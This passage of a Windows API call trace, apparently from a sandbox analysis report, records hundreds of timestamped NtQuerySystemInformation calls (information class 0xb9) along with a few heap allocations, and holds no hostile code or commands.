NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0289.340] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d0e0, Length=0x28, ResultLength=0x0) [0289.341] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0289.341] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0289.341] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d150, Length=0x28, ResultLength=0x0) [0289.341] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0289.341] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0289.341] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d2b0, Length=0x38, ResultLength=0x0) [0289.342] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0289.342] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d1d0, Length=0x28, ResultLength=0x0) [0289.344] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0289.344] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0289.344] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0289.345] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0289.345] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0289.345] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d1d0, Length=0x28, ResultLength=0x0) [0289.345] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0289.345] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0289.345] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d2b0, Length=0x38, ResultLength=0x0) [0289.345] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d130, Length=0x20, ResultLength=0x0) [0289.345] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d0b0, Length=0x20, ResultLength=0x0) [0289.345] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0289.346] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d0b0, Length=0x20, ResultLength=0x0) [0289.346] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0289.346] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d0b0, Length=0x20, ResultLength=0x0) [0289.346] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0289.346] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0289.346] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0289.346] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0289.346] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d2b0, Length=0x38, ResultLength=0x0) [0289.346] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d130, Length=0x20, ResultLength=0x0) [0289.346] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d0c0, Length=0x20, ResultLength=0x0) [0289.347] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0289.347] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0289.347] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0289.347] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d0c0, Length=0x20, ResultLength=0x0) [0289.347] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0289.347] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0289.347] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0289.347] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0289.347] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0289.347] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0289.353] GetProcessHeap () returned 0x269489b0000 [0289.353] RtlAllocateHeap (HeapHandle=0x269489b0000, Flags=0x0, Size=0x28) returned 0x26949c6b7a0 [0289.382] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0289.382] GetProcessHeap () returned 0x269489b0000 [0289.382] RtlAllocateHeap (HeapHandle=0x269489b0000, Flags=0x0, Size=0x28) returned 0x26949c6b5c0 [0289.382] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0289.383] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0289.394] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0296.061] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0296.061] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207f330, Length=0x48, ResultLength=0x0) [0296.066] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0296.066] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0296.067] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) Thread: id = 635 os_tid = 0xff4 [0226.922] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.927] GetProcessHeap () returned 0x269489b0000 [0226.927] RtlAllocateHeap (HeapHandle=0x269489b0000, Flags=0x0, Size=0xb0) returned 0x269489f18a0 [0226.953] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.957] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.985] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffef20, Length=0x50, ResultLength=0x0) [0226.985] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.985] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffef20, Length=0x50, ResultLength=0x0) [0226.985] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.985] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffef20, Length=0x50, ResultLength=0x0) [0226.985] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffee10, Length=0x50, ResultLength=0x0) [0226.985] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.985] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffee10, Length=0x50, ResultLength=0x0) [0226.985] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.985] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffee10, Length=0x50, ResultLength=0x0) [0226.986] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.986] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffee10, Length=0x50, ResultLength=0x0) [0226.986] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.986] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffed40, Length=0x38, ResultLength=0x0) [0226.988] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.988] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffeb70, Length=0x28, ResultLength=0x0) [0226.988] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.988] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.988] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffeb70, Length=0x28, ResultLength=0x0) [0226.988] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.988] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.988] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffeb70, Length=0x28, ResultLength=0x0) [0226.988] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.988] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.988] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffeb70, Length=0x28, ResultLength=0x0) [0226.988] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.988] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.989] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffebe0, Length=0x28, ResultLength=0x0) [0226.989] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.989] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.989] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffed40, Length=0x38, ResultLength=0x0) [0226.989] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.989] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffec60, Length=0x28, ResultLength=0x0) [0226.991] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.991] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.991] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.991] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffec60, Length=0x28, ResultLength=0x0) [0226.991] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffeb00, Length=0x20, ResultLength=0x0) [0226.991] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffea80, Length=0x20, ResultLength=0x0) [0226.992] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.992] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffea80, Length=0x20, ResultLength=0x0) [0226.992] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.992] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffea80, Length=0x20, ResultLength=0x0) [0226.992] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.992] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.992] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.992] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.992] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.992] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffed40, Length=0x38, ResultLength=0x0) [0226.992] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.992] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffed40, Length=0x38, ResultLength=0x0) [0226.992] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffebc0, Length=0x20, ResultLength=0x0) [0226.992] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffeb50, Length=0x20, ResultLength=0x0) [0226.993] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.993] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.993] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.993] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffeb50, Length=0x20, ResultLength=0x0) [0226.993] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.993] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.993] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.993] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.993] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.993] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.993] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.996] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781fff000, Length=0x50, ResultLength=0x0) [0226.996] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.996] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781fff000, Length=0x50, ResultLength=0x0) [0226.996] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.996] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781fff000, Length=0x50, ResultLength=0x0) [0226.996] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffeef0, Length=0x50, ResultLength=0x0) [0226.996] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.996] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffeef0, Length=0x50, ResultLength=0x0) [0226.996] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.996] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffeef0, Length=0x50, ResultLength=0x0) [0226.996] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.996] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffeef0, Length=0x50, ResultLength=0x0) [0226.996] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.996] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffee20, Length=0x38, ResultLength=0x0) [0232.808] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0232.808] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffec50, Length=0x28, ResultLength=0x0) [0232.808] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0232.808] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0232.809] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffec50, Length=0x28, ResultLength=0x0) [0232.809] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0232.809] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0232.809] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffec50, Length=0x28, ResultLength=0x0) [0232.809] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0232.809] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0232.809] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffec50, Length=0x28, ResultLength=0x0) [0232.809] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0232.809] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0232.810] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffecc0, Length=0x28, ResultLength=0x0) [0232.810] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0232.810] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0232.810] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffee20, Length=0x38, ResultLength=0x0) [0232.810] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0232.810] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffed40, Length=0x28, ResultLength=0x0) [0232.812] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0232.812] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0232.812] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0232.813] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffed40, Length=0x28, ResultLength=0x0) [0232.813] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffebe0, Length=0x20, ResultLength=0x0) [0232.813] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffeb60, Length=0x20, ResultLength=0x0) [0232.813] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0232.813] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffeb60, Length=0x20, ResultLength=0x0) [0232.813] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0232.813] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffeb60, Length=0x20, ResultLength=0x0) [0232.813] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0232.813] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0232.813] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0232.813] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0232.813] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0232.814] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffee20, Length=0x38, ResultLength=0x0) [0232.814] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0232.814] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffee20, Length=0x38, ResultLength=0x0) [0232.814] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffeca0, Length=0x20, ResultLength=0x0) [0232.814] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffec30, Length=0x20, ResultLength=0x0) [0232.814] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0232.814] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0232.814] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0232.814] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffec30, Length=0x20, ResultLength=0x0) [0232.814] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0232.814] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0232.814] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0232.814] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0232.814] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0232.815] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0232.815] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0232.817] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781fff000, Length=0x50, ResultLength=0x0) [0232.817] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0232.817] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781fff000, Length=0x50, ResultLength=0x0) [0232.817] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0232.817] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781fff000, Length=0x50, ResultLength=0x0) [0232.817] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffeef0, Length=0x50, ResultLength=0x0) [0232.817] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0232.817] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffeef0, Length=0x50, ResultLength=0x0) [0232.817] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0232.817] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffeef0, Length=0x50, ResultLength=0x0) [0232.818] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0232.818] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffeef0, Length=0x50, ResultLength=0x0) [0232.818] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0232.818] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffee20, Length=0x38, ResultLength=0x0) [0232.820] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0232.820] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffec50, Length=0x28, ResultLength=0x0) [0232.820] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0232.820] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0232.820] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffec50, Length=0x28, ResultLength=0x0) [0232.820] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0232.820] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0232.820] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffec50, Length=0x28, ResultLength=0x0) [0232.821] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0232.821] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0232.821] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffec50, Length=0x28, ResultLength=0x0) [0232.821] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0232.821] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0232.821] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffecc0, Length=0x28, ResultLength=0x0) [0232.821] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0232.821] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0232.821] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffee20, Length=0x38, ResultLength=0x0) [0232.821] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0232.822] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffed40, Length=0x28, ResultLength=0x0) [0232.824] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0232.824] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0232.824] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0232.824] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffed40, Length=0x28, ResultLength=0x0) [0232.827] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffebe0, Length=0x20, ResultLength=0x0) [0232.827] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffeb60, Length=0x20, ResultLength=0x0) [0232.827] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0232.827] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffeb60, Length=0x20, ResultLength=0x0) [0232.827] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0232.827] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffeb60, Length=0x20, ResultLength=0x0) [0232.827] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0232.827] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0232.827] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0232.827] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0232.827] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0232.828] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffee20, Length=0x38, ResultLength=0x0) [0232.828] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0232.828] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffee20, Length=0x38, ResultLength=0x0) [0232.828] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffeca0, Length=0x20, ResultLength=0x0) [0232.828] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffec30, Length=0x20, ResultLength=0x0) [0232.828] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0232.828] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0232.828] NtQuerySystemInformation 